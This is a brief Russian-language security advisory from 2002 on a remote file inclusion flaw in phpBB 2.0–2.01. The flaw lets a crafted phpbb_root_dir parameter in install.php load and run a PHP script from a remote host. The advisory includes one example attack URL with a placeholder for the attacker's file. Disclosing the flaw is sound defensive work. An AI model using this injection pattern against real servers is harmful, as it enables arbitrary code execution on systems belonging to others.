Внедрение произвольного PHP кода в phpBB2

Дата публикации:
20.06.2002
Всего просмотров:
1638
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Проблема, обнаруженная в phpBB2, позволяет включать произвольный файл, расположенный на удаленном хосте. Если включенный файл – PHP сценарий, то возможно выполнение произвольного кода с привилегиями Web сервера. На Windows системах – с системными привилегиями. Пример:

http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE

Уязвимость обнаружена в phpBB Group phpBB 2.0-2.01

Ссылки: malicious PHP source injection in phpBB

или введите имя

CAPTCHA